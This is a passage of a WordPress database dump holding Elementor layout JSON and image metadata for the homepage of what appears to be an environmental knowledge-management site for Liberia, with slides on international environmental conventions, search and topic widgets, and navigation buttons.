Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\"}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\"}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\"}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(27026,3933,'_elementor_version','3.4.0'),(27027,3933,'_elementor_template_type','wp-page'),(27028,3933,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(38612,5782,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:680;s:6:\"height\";i:681;s:4:\"file\";s:20:\"2026/02/EKMS-LIB.jpg\";s:8:\"filesize\";i:104989;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"EKMS-LIB-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12472;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"EKMS-LIB-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4942;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"EKMS-LIB-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14690;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:19:\"EKMS-LIB-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3449;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:20:\"EKMS-LIB-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8109;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:20:\"EKMS-LIB-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17596;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:20:\"EKMS-LIB-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22928;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:20:\"EKMS-LIB-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28077;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:20:\"EKMS-LIB-680x650.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39772;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:20:\"EKMS-LIB-600x601.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:601;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31326;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:20:\"EKMS-LIB-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34140;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:20:\"EKMS-LIB-680x640.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40005;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27030,3933,'_elementor_pro_version','3.3.6'),(27032,3934,'_wp_page_template','default'),(27033,3934,'_elementor_edit_mode','builder'),(27034,3934,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_cbd.jpg\",\"id\":209,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_marine.jpg\",\"id\":210,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/slide_ccd.jpg\",\"id\":211,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}]},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\"}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\"}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\"}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(27035,3934,'_elementor_version','3.4.0'),(27036,3934,'_elementor_template_type','wp-page'),(27037,3934,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(27039,3934,'_elementor_pro_version','3.3.6'),(27041,3935,'_wp_page_template','default'),(27042,3935,'_elementor_edit_mode','builder'),(27043,3935,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"